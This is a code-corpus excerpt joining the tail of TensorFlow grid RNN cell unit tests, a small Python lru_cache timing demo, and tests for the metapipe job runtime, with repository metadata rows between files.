self.assertEqual(s[0].h.get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s], {
x: np.array([[1., 1., 1.]]),
m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),)
})
self.assertEqual(res_g[0].shape, (1, 2))
self.assertAllClose(res_g[0], [[0.31667367, 0.31667367]])
self.assertAllClose(res_s, (([[0.29530135, 0.37520045]],
[[0.17044567, 0.21292259]]),))
"""LSTMCell
"""
def testGrid2LSTMCell(self):
with self.test_session(use_gpu=False) as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
x = array_ops.zeros([1, 3])
m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
(array_ops.zeros([1, 2]), array_ops.zeros([1, 2])))
cell = grid_rnn_cell.Grid2LSTMCell(2, use_peepholes=True)
self.assertEqual(cell.state_size, ((2, 2), (2, 2)))
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (1, 2))
self.assertEqual(s[0].c.get_shape(), (1, 2))
self.assertEqual(s[0].h.get_shape(), (1, 2))
self.assertEqual(s[1].c.get_shape(), (1, 2))
self.assertEqual(s[1].h.get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s], {
x:
np.array([[1., 1., 1.]]),
m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),
(np.array([[0.5, 0.6]]), np.array([[0.7, 0.8]])))
})
self.assertEqual(res_g[0].shape, (1, 2))
self.assertEqual(res_s[0].c.shape, (1, 2))
self.assertEqual(res_s[0].h.shape, (1, 2))
self.assertEqual(res_s[1].c.shape, (1, 2))
self.assertEqual(res_s[1].h.shape, (1, 2))
self.assertAllClose(res_g[0], [[0.95686918, 0.95686918]])
self.assertAllClose(
res_s, (([[2.41515064, 2.41515064]], [[0.95686918, 0.95686918]]),
([[1.38917875, 1.49043763]], [[0.83884692, 0.86036491]])))
def testGrid2LSTMCellTied(self):
with self.test_session(use_gpu=False) as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
x = array_ops.zeros([1, 3])
m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
(array_ops.zeros([1, 2]), array_ops.zeros([1, 2])))
cell = grid_rnn_cell.Grid2LSTMCell(2, tied=True, use_peepholes=True)
self.assertEqual(cell.state_size, ((2, 2), (2, 2)))
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (1, 2))
self.assertEqual(s[0].c.get_shape(), (1, 2))
self.assertEqual(s[0].h.get_shape(), (1, 2))
self.assertEqual(s[1].c.get_shape(), (1, 2))
self.assertEqual(s[1].h.get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s], {
x:
np.array([[1., 1., 1.]]),
m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),
(np.array([[0.5, 0.6]]), np.array([[0.7, 0.8]])))
})
self.assertEqual(res_g[0].shape, (1, 2))
self.assertEqual(res_s[0].c.shape, (1, 2))
self.assertEqual(res_s[0].h.shape, (1, 2))
self.assertEqual(res_s[1].c.shape, (1, 2))
self.assertEqual(res_s[1].h.shape, (1, 2))
self.assertAllClose(res_g[0], [[0.95686918, 0.95686918]])
self.assertAllClose(
res_s, (([[2.41515064, 2.41515064]], [[0.95686918, 0.95686918]]),
([[1.38917875, 1.49043763]], [[0.83884692, 0.86036491]])))
def testGrid2LSTMCellWithRelu(self):
with self.cached_session() as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
x = array_ops.zeros([1, 3])
m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),)
cell = grid_rnn_cell.Grid2LSTMCell(
2, use_peepholes=True, non_recurrent_fn=nn_ops.relu)
self.assertEqual(cell.state_size, ((2, 2),))
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (1, 2))
self.assertEqual(s[0].c.get_shape(), (1, 2))
self.assertEqual(s[0].h.get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s], {
x: np.array([[1., 1., 1.]]),
m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),)
})
self.assertEqual(res_g[0].shape, (1, 2))
self.assertAllClose(res_g[0], [[2.1831727, 2.1831727]])
self.assertAllClose(res_s, (([[0.92270052, 1.02325559]],
[[0.66159075, 0.70475441]]),))
"""RNNCell
"""
def testGrid2BasicRNNCell(self):
with self.cached_session() as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
x = array_ops.zeros([2, 2])
m = (array_ops.zeros([2, 2]), array_ops.zeros([2, 2]))
cell = grid_rnn_cell.Grid2BasicRNNCell(2)
self.assertEqual(cell.state_size, (2, 2))
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (2, 2))
self.assertEqual(s[0].get_shape(), (2, 2))
self.assertEqual(s[1].get_shape(), (2, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s], {
x:
np.array([[1., 1.], [2., 2.]]),
m: (np.array([[0.1, 0.1], [0.2, 0.2]]), np.array([[0.1, 0.1],
[0.2, 0.2]]))
})
self.assertEqual(res_g[0].shape, (2, 2))
self.assertEqual(res_s[0].shape, (2, 2))
self.assertEqual(res_s[1].shape, (2, 2))
self.assertAllClose(res_g, ([[0.94685763, 0.94685763],
[0.99480951, 0.99480951]],))
self.assertAllClose(
res_s, ([[0.94685763, 0.94685763], [0.99480951, 0.99480951]],
[[0.80049908, 0.80049908], [0.97574311, 0.97574311]]))
def testGrid2BasicRNNCellTied(self):
with self.cached_session() as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
x = array_ops.zeros([2, 2])
m = (array_ops.zeros([2, 2]), array_ops.zeros([2, 2]))
cell = grid_rnn_cell.Grid2BasicRNNCell(2, tied=True)
self.assertEqual(cell.state_size, (2, 2))
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (2, 2))
self.assertEqual(s[0].get_shape(), (2, 2))
self.assertEqual(s[1].get_shape(), (2, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s], {
x:
np.array([[1., 1.], [2., 2.]]),
m: (np.array([[0.1, 0.1], [0.2, 0.2]]), np.array([[0.1, 0.1],
[0.2, 0.2]]))
})
self.assertEqual(res_g[0].shape, (2, 2))
self.assertEqual(res_s[0].shape, (2, 2))
self.assertEqual(res_s[1].shape, (2, 2))
self.assertAllClose(res_g, ([[0.94685763, 0.94685763],
[0.99480951, 0.99480951]],))
self.assertAllClose(
res_s, ([[0.94685763, 0.94685763], [0.99480951, 0.99480951]],
[[0.80049908, 0.80049908], [0.97574311, 0.97574311]]))
def testGrid2BasicRNNCellWithRelu(self):
with self.cached_session() as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
x = array_ops.zeros([1, 2])
m = (array_ops.zeros([1, 2]),)
cell = grid_rnn_cell.Grid2BasicRNNCell(2, non_recurrent_fn=nn_ops.relu)
self.assertEqual(cell.state_size, (2,))
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (1, 2))
self.assertEqual(s[0].get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run(
[g, s], {x: np.array([[1., 1.]]),
m: np.array([[0.1, 0.1]])})
self.assertEqual(res_g[0].shape, (1, 2))
self.assertEqual(res_s[0].shape, (1, 2))
self.assertAllClose(res_g, ([[1.80049896, 1.80049896]],))
self.assertAllClose(res_s, ([[0.80049896, 0.80049896]],))
"""1-LSTM
"""
def testGrid1LSTMCell(self):
with self.cached_session() as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)) as root_scope:
x = array_ops.zeros([1, 3])
m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),)
cell = grid_rnn_cell.Grid1LSTMCell(2, use_peepholes=True)
self.assertEqual(cell.state_size, ((2, 2),))
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (1, 2))
self.assertEqual(s[0].c.get_shape(), (1, 2))
self.assertEqual(s[0].h.get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s], {
x: np.array([[1., 1., 1.]]),
m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),)
})
self.assertEqual(res_g[0].shape, (1, 2))
self.assertEqual(res_s[0].c.shape, (1, 2))
self.assertEqual(res_s[0].h.shape, (1, 2))
self.assertAllClose(res_g, ([[0.91287315, 0.91287315]],))
self.assertAllClose(res_s, (([[2.26285243, 2.26285243]],
[[0.91287315, 0.91287315]]),))
root_scope.reuse_variables()
x2 = array_ops.zeros([0, 0])
g2, s2 = cell(x2, m)
self.assertEqual(g2[0].get_shape(), (1, 2))
self.assertEqual(s2[0].c.get_shape(), (1, 2))
self.assertEqual(s2[0].h.get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g2, res_s2 = sess.run([g2, s2], {m: res_s})
self.assertEqual(res_g2[0].shape, (1, 2))
self.assertEqual(res_s2[0].c.shape, (1, 2))
self.assertEqual(res_s2[0].h.shape, (1, 2))
self.assertAllClose(res_g2, ([[0.9032144, 0.9032144]],))
self.assertAllClose(res_s2, (([[2.79966092, 2.79966092]],
[[0.9032144, 0.9032144]]),))
g3, s3 = cell(x2, m)
self.assertEqual(g3[0].get_shape(), (1, 2))
self.assertEqual(s3[0].c.get_shape(), (1, 2))
self.assertEqual(s3[0].h.get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g3, res_s3 = sess.run([g3, s3], {m: res_s2})
self.assertEqual(res_g3[0].shape, (1, 2))
self.assertEqual(res_s3[0].c.shape, (1, 2))
self.assertEqual(res_s3[0].h.shape, (1, 2))
self.assertAllClose(res_g3, ([[0.92727238, 0.92727238]],))
self.assertAllClose(res_s3, (([[3.3529923, 3.3529923]],
[[0.92727238, 0.92727238]]),))
"""3-LSTM
"""
def testGrid3LSTMCell(self):
with self.cached_session() as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
x = array_ops.zeros([1, 3])
m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
(array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
(array_ops.zeros([1, 2]), array_ops.zeros([1, 2])))
cell = grid_rnn_cell.Grid3LSTMCell(2, use_peepholes=True)
self.assertEqual(cell.state_size, ((2, 2), (2, 2), (2, 2)))
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (1, 2))
self.assertEqual(s[0].c.get_shape(), (1, 2))
self.assertEqual(s[0].h.get_shape(), (1, 2))
self.assertEqual(s[1].c.get_shape(), (1, 2))
self.assertEqual(s[1].h.get_shape(), (1, 2))
self.assertEqual(s[2].c.get_shape(), (1, 2))
self.assertEqual(s[2].h.get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s], {
x:
np.array([[1., 1., 1.]]),
m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),
(np.array([[0.5, 0.6]]), np.array([[0.7, 0.8]])), (np.array(
[[-0.1, -0.2]]), np.array([[-0.3, -0.4]])))
})
self.assertEqual(res_g[0].shape, (1, 2))
self.assertEqual(res_s[0].c.shape, (1, 2))
self.assertEqual(res_s[0].h.shape, (1, 2))
self.assertEqual(res_s[1].c.shape, (1, 2))
self.assertEqual(res_s[1].h.shape, (1, 2))
self.assertEqual(res_s[2].c.shape, (1, 2))
self.assertEqual(res_s[2].h.shape, (1, 2))
self.assertAllClose(res_g, ([[0.96892911, 0.96892911]],))
self.assertAllClose(
res_s, (([[2.45227885, 2.45227885]], [[0.96892911, 0.96892911]]),
([[1.33592629, 1.4373529]], [[0.80867189, 0.83247656]]),
([[0.7317788, 0.63205892]], [[0.56548983, 0.50446129]])))
"""Edge cases
"""
def testGridRNNEdgeCasesLikeRelu(self):
with self.cached_session() as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
x = array_ops.zeros([3, 2])
m = ()
# this is equivalent to relu
cell = grid_rnn_cell.GridRNNCell(
num_units=2,
num_dims=1,
input_dims=0,
output_dims=0,
non_recurrent_dims=0,
non_recurrent_fn=nn_ops.relu)
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (3, 2))
self.assertEqual(s, ())
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s],
{x: np.array([[1., -1.], [-2, 1], [2, -1]])})
self.assertEqual(res_g[0].shape, (3, 2))
self.assertEqual(res_s, ())
self.assertAllClose(res_g, ([[0, 0], [0, 0], [0.5, 0.5]],))
def testGridRNNEdgeCasesNoOutput(self):
with self.cached_session() as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
x = array_ops.zeros([1, 2])
m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),)
# This cell produces no output
cell = grid_rnn_cell.GridRNNCell(
num_units=2,
num_dims=2,
input_dims=0,
output_dims=None,
non_recurrent_dims=0,
non_recurrent_fn=nn_ops.relu)
g, s = cell(x, m)
self.assertEqual(g, ())
self.assertEqual(s[0].c.get_shape(), (1, 2))
self.assertEqual(s[0].h.get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s], {
x: np.array([[1., 1.]]),
m: ((np.array([[0.1, 0.1]]), np.array([[0.1, 0.1]])),)
})
self.assertEqual(res_g, ())
self.assertEqual(res_s[0].c.shape, (1, 2))
self.assertEqual(res_s[0].h.shape, (1, 2))
"""Test with tf.nn.rnn
"""
def testGrid2LSTMCellWithRNN(self):
batch_size = 3
input_size = 5
max_length = 6 # unrolled up to this length
num_units = 2
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
cell = grid_rnn_cell.Grid2LSTMCell(num_units=num_units)
inputs = max_length * [
array_ops.placeholder(
dtypes.float32, shape=(batch_size, input_size))
]
outputs, state = rnn.static_rnn(cell, inputs, dtype=dtypes.float32)
self.assertEqual(len(outputs), len(inputs))
self.assertEqual(state[0].c.get_shape(), (batch_size, 2))
self.assertEqual(state[0].h.get_shape(), (batch_size, 2))
self.assertEqual(state[1].c.get_shape(), (batch_size, 2))
self.assertEqual(state[1].h.get_shape(), (batch_size, 2))
for out, inp in zip(outputs, inputs):
self.assertEqual(len(out), 1)
self.assertEqual(out[0].get_shape()[0], inp.get_shape()[0])
self.assertEqual(out[0].get_shape()[1], num_units)
self.assertEqual(out[0].dtype, inp.dtype)
with self.cached_session() as sess:
sess.run(variables.global_variables_initializer())
input_value = np.ones((batch_size, input_size))
values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
for tp in values[:-1]:
for v in tp:
self.assertTrue(np.all(np.isfinite(v)))
for tp in values[-1]:
for st in tp:
for v in st:
self.assertTrue(np.all(np.isfinite(v)))
def testGrid2LSTMCellReLUWithRNN(self):
batch_size = 3
input_size = 5
max_length = 6 # unrolled up to this length
num_units = 2
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
cell = grid_rnn_cell.Grid2LSTMCell(
num_units=num_units, non_recurrent_fn=nn_ops.relu)
inputs = max_length * [
array_ops.placeholder(dtypes.float32, shape=(batch_size, input_size))
]
outputs, state = rnn.static_rnn(cell, inputs, dtype=dtypes.float32)
self.assertEqual(len(outputs), len(inputs))
self.assertEqual(state[0].c.get_shape(), (batch_size, 2))
self.assertEqual(state[0].h.get_shape(), (batch_size, 2))
for out, inp in zip(outputs, inputs):
self.assertEqual(len(out), 1)
self.assertEqual(out[0].get_shape()[0], inp.get_shape()[0])
self.assertEqual(out[0].get_shape()[1], num_units)
self.assertEqual(out[0].dtype, inp.dtype)
with self.cached_session() as sess:
sess.run(variables.global_variables_initializer())
input_value = np.ones((batch_size, input_size))
values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
for tp in values[:-1]:
for v in tp:
self.assertTrue(np.all(np.isfinite(v)))
for tp in values[-1]:
for st in tp:
for v in st:
self.assertTrue(np.all(np.isfinite(v)))
def testGrid3LSTMCellReLUWithRNN(self):
batch_size = 3
input_size = 5
max_length = 6 # unrolled up to this length
num_units = 2
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
cell = grid_rnn_cell.Grid3LSTMCell(
num_units=num_units, non_recurrent_fn=nn_ops.relu)
inputs = max_length * [
array_ops.placeholder(dtypes.float32, shape=(batch_size, input_size))
]
outputs, state = rnn.static_rnn(cell, inputs, dtype=dtypes.float32)
self.assertEqual(len(outputs), len(inputs))
self.assertEqual(state[0].c.get_shape(), (batch_size, 2))
self.assertEqual(state[0].h.get_shape(), (batch_size, 2))
self.assertEqual(state[1].c.get_shape(), (batch_size, 2))
self.assertEqual(state[1].h.get_shape(), (batch_size, 2))
for out, inp in zip(outputs, inputs):
self.assertEqual(len(out), 1)
self.assertEqual(out[0].get_shape()[0], inp.get_shape()[0])
self.assertEqual(out[0].get_shape()[1], num_units)
self.assertEqual(out[0].dtype, inp.dtype)
with self.cached_session() as sess:
sess.run(variables.global_variables_initializer())
input_value = np.ones((batch_size, input_size))
values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
for tp in values[:-1]:
for v in tp:
self.assertTrue(np.all(np.isfinite(v)))
for tp in values[-1]:
for st in tp:
for v in st:
self.assertTrue(np.all(np.isfinite(v)))
def testGrid1LSTMCellWithRNN(self):
batch_size = 3
input_size = 5
max_length = 6 # unrolled up to this length
num_units = 2
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
cell = grid_rnn_cell.Grid1LSTMCell(num_units=num_units)
# for 1-LSTM, we only feed the first step
inputs = ([
array_ops.placeholder(
dtypes.float32, shape=(batch_size, input_size))
] + (max_length - 1) * [array_ops.zeros([batch_size, input_size])])
outputs, state = rnn.static_rnn(cell, inputs, dtype=dtypes.float32)
self.assertEqual(len(outputs), len(inputs))
self.assertEqual(state[0].c.get_shape(), (batch_size, 2))
self.assertEqual(state[0].h.get_shape(), (batch_size, 2))
for out, inp in zip(outputs, inputs):
self.assertEqual(len(out), 1)
self.assertEqual(out[0].get_shape(), (3, num_units))
self.assertEqual(out[0].dtype, inp.dtype)
with self.cached_session() as sess:
sess.run(variables.global_variables_initializer())
input_value = np.ones((batch_size, input_size))
values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
for tp in values[:-1]:
for v in tp:
self.assertTrue(np.all(np.isfinite(v)))
for tp in values[-1]:
for st in tp:
for v in st:
self.assertTrue(np.all(np.isfinite(v)))
def testGrid2LSTMCellWithRNNAndDynamicBatchSize(self):
"""Test for #4296."""
input_size = 5
max_length = 6 # unrolled up to this length
num_units = 2
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
cell = grid_rnn_cell.Grid2LSTMCell(num_units=num_units)
inputs = max_length * [
array_ops.placeholder(dtypes.float32, shape=(None, input_size))
]
outputs, state = rnn.static_rnn(cell, inputs, dtype=dtypes.float32)
self.assertEqual(len(outputs), len(inputs))
for out, inp in zip(outputs, inputs):
self.assertEqual(len(out), 1)
self.assertTrue(out[0].get_shape().dims[0].value is None)
self.assertEqual(out[0].get_shape().dims[1], num_units)
self.assertEqual(out[0].dtype, inp.dtype)
with self.cached_session() as sess:
sess.run(variables.global_variables_initializer())
input_value = np.ones((3, input_size))
values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
for tp in values[:-1]:
for v in tp:
self.assertTrue(np.all(np.isfinite(v)))
for tp in values[-1]:
for st in tp:
for v in st:
self.assertTrue(np.all(np.isfinite(v)))
def testGrid2LSTMCellLegacy(self):
"""Test for legacy case (when state_is_tuple=False)."""
with self.cached_session() as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.5)):
x = array_ops.zeros([1, 3])
m = array_ops.zeros([1, 8])
cell = grid_rnn_cell.Grid2LSTMCell(
2, use_peepholes=True, state_is_tuple=False, output_is_tuple=False)
self.assertEqual(cell.state_size, 8)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (1, 2))
self.assertEqual(s.get_shape(), (1, 8))
sess.run([variables.global_variables_initializer()])
res = sess.run([g, s], {
x: np.array([[1., 1., 1.]]),
m: np.array([[0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8]])
})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 8))
self.assertAllClose(res[0], [[0.95686918, 0.95686918]])
self.assertAllClose(res[1], [[
2.41515064, 2.41515064, 0.95686918, 0.95686918, 1.38917875,
1.49043763, 0.83884692, 0.86036491
]])
if __name__ == '__main__':
test.main()
| 40.463807
| 80
| 0.574571
| 4,287
| 30,186
| 3.898764
| 0.066014
| 0.150772
| 0.0423
| 0.057257
| 0.848271
| 0.822125
| 0.812433
| 0.802561
| 0.775278
| 0.765586
| 0
| 0.099232
| 0.24518
| 30,186
| 745
| 81
| 40.518121
| 0.634321
| 0.035182
| 0
| 0.737896
| 0
| 0
| 0.002899
| 0
| 0
| 0
| 0
| 0
| 0.353923
| 1
| 0.03172
| false
| 0
| 0.021703
| 0
| 0.055092
| 0.001669
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
364de1c024e2d1e5cd215cf2a42b08710dcc545c
| 1,675
|
py
|
Python
|
python/lrucache/foo.py
|
trammell/test
|
ccac5e1dac947032e64d813e53cb961417a58d05
|
[
"Artistic-2.0"
] | null | null | null |
python/lrucache/foo.py
|
trammell/test
|
ccac5e1dac947032e64d813e53cb961417a58d05
|
[
"Artistic-2.0"
] | null | null | null |
python/lrucache/foo.py
|
trammell/test
|
ccac5e1dac947032e64d813e53cb961417a58d05
|
[
"Artistic-2.0"
] | null | null | null |
#!/usr/bin/env python3
"""
Sample LRUCache code. See https://docs.python.org/3/library/functools.html
for gory details.
"""
from functools import lru_cache
import time
@lru_cache(maxsize=4)
def slowadd(a,b):
"""Add two numbers, poorly."""
time.sleep(1)
return a + b
start_time = time.time()
print("1 + 1 = %d" % slowadd(1,1))
print("--- %s seconds ---\n" % (time.time() - start_time))
start_time = time.time()
print("1 + 1 = %d" % slowadd(1,1))
print("--- %s seconds ---\n" % (time.time() - start_time))
start_time = time.time()
print("1 + 1 = %d" % slowadd(1,1))
print("--- %s seconds ---\n" % (time.time() - start_time))
start_time = time.time()
print("1 + 2 = %d" % slowadd(1,2))
print("--- %s seconds ---\n" % (time.time() - start_time))
start_time = time.time()
print("2 + 1 = %d" % slowadd(2,1))
print("--- %s seconds ---\n" % (time.time() - start_time))
start_time = time.time()
print("2 + 2 = %d" % slowadd(2,2))
print("--- %s seconds ---\n" % (time.time() - start_time))
print(slowadd.cache_info())
start_time = time.time()
print("2 + 3 = %d" % slowadd(2,3))
print("--- %s seconds ---\n" % (time.time() - start_time))
start_time = time.time()
print("1 + 1 = %d" % slowadd(1,1))
print("--- %s seconds ---\n" % (time.time() - start_time))
@lru_cache(maxsize=4)
def one():
time.sleep(1)
return 1
start_time = time.time()
print("one() = %d" % one())
print("--- %s seconds ---\n" % (time.time() - start_time))
start_time = time.time()
print("one() = %d" % one())
print("--- %s seconds ---\n" % (time.time() - start_time))
start_time = time.time()
print("one() = %d" % one())
print("--- %s seconds ---\n" % (time.time() - start_time))
| 24.632353
| 74
| 0.583881
| 259
| 1,675
| 3.675676
| 0.177606
| 0.277311
| 0.259454
| 0.196429
| 0.736345
| 0.736345
| 0.668067
| 0.668067
| 0.668067
| 0.633403
| 0
| 0.027679
| 0.158806
| 1,675
| 67
| 75
| 25
| 0.647977
| 0.082985
| 0
| 0.75
| 0
| 0
| 0.216678
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.045455
| 0
| 0.136364
| 0.522727
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
365f979f0e83f8f44b84623a56a6fc3d1317c5c5
| 5,075
|
py
|
Python
|
test/test_runtime.py
|
TorkamaniLab/metapipe
|
15592e5b0c217afb00ac03503f8d0d7453d4baf4
|
[
"MIT"
] | 11
|
2016-01-26T06:47:05.000Z
|
2022-02-23T19:12:00.000Z
|
test/test_runtime.py
|
TorkamaniLab/metapipe
|
15592e5b0c217afb00ac03503f8d0d7453d4baf4
|
[
"MIT"
] | 44
|
2016-01-08T00:46:47.000Z
|
2016-04-13T00:46:47.000Z
|
test/test_runtime.py
|
TorkamaniLab/metapipe
|
15592e5b0c217afb00ac03503f8d0d7453d4baf4
|
[
"MIT"
] | 4
|
2015-10-30T19:24:13.000Z
|
2020-01-25T02:56:53.000Z
|
""" Tests for the runtime using a mock job. """
from __future__ import print_function
import sure
from metapipe.parser import Parser
from metapipe.runtime import Runtime
from metapipe.models import *
from .mocks import MockJob
from .fixtures import *
JOB_TYPES = {
'mock': MockJob,
'local': LocalJob,
}
# New Command Tests
def test_get_new_commands_1():
parser = Parser(overall)
cmds = parser.consume()[:1]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock')
new = pipeline.queue.queue
new.should.have.length_of(1)
def test_get_new_commands_2():
parser = Parser(overall)
cmds = parser.consume()[:2]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock')
new = pipeline.queue.queue
new.should.have.length_of(2)
def test_get_new_commands_3():
parser = Parser(overall)
cmds = parser.consume()[:3]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock')
new = pipeline.queue.queue
new.should.have.length_of(3)
def test_get_new_commands_4():
parser = Parser(overall)
cmds = parser.consume()[:4]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock')
new = pipeline.queue.queue
new.should.have.length_of(4)
def test_get_new_commands_5():
parser = Parser(overall)
cmds = parser.consume()[:5]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock')
new = pipeline.queue.queue
new.should.have.length_of(5)
def test_get_new_commands_6():
parser = Parser(overall)
cmds = parser.consume()[:6]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock')
new = pipeline.queue.queue
new.should.have.length_of(6)
def test_get_new_commands_7():
parser = Parser(overall)
cmds = parser.consume()[:7]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock')
new = pipeline.queue.queue
new.should.have.length_of(7)
def test_get_new_commands_8():
parser = Parser(overall)
cmds = parser.consume()[:8]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock')
new = pipeline.queue.queue
new.should.have.length_of(8)
def test_get_new_commands_9():
parser = Parser(overall)
cmds = parser.consume()[:9]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock')
new = pipeline.queue.queue
new.should.have.length_of(9)
# Run Tests
def test_run_1():
parser = Parser(overall)
cmds = parser.consume()[:1]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock', sleep_time=0.01)
iters = pipeline.run()
iters.should.equal(8)
def test_run_2():
parser = Parser(overall)
cmds = parser.consume()[:2]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock', sleep_time=0.01)
iters = pipeline.run()
iters.should.equal(15)
def test_run_3():
parser = Parser(overall)
cmds = parser.consume()[:3]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock', sleep_time=0.01)
iters = pipeline.run()
iters.should.equal(23)
def test_run_4():
parser = Parser(overall)
cmds = parser.consume()[:4]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock', sleep_time=0.01)
iters = pipeline.run()
iters.should.equal(23)
def test_run_5():
parser = Parser(overall)
cmds = parser.consume()[:5]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock', sleep_time=0.01)
iters = pipeline.run()
iters.should.equal(23)
def test_run_6():
parser = Parser(overall)
cmds = parser.consume()[:6]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock', sleep_time=0.01)
iters = pipeline.run()
iters.should.equal(23)
def test_run_7():
parser = Parser(overall)
cmds = parser.consume()[:7]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock', sleep_time=0.01)
iters = pipeline.run()
iters.should.equal(24)
def test_run_8():
parser = Parser(overall)
cmds = parser.consume()[:8]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock', sleep_time=0.01)
iters = pipeline.run()
iters.should.equal(24)
def test_run_9():
parser = Parser(overall)
cmds = parser.consume()[:9]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock', sleep_time=0.01)
iters = pipeline.run()
iters.should.equal(25)
def test_run_10():
parser = Parser(overall)
cmds = parser.consume()[:10]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock', sleep_time=0.01)
iters = pipeline.run()
iters.should.equal(25)
def test_run_11():
parser = Parser(overall)
cmds = parser.consume()[:11]
pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock', sleep_time=0.01)
iters = pipeline.run()
iters.should.be.greater_than(15)
def test_max_concurrent_jobs():
parser = Parser(concurrent)
cmds = parser.consume()
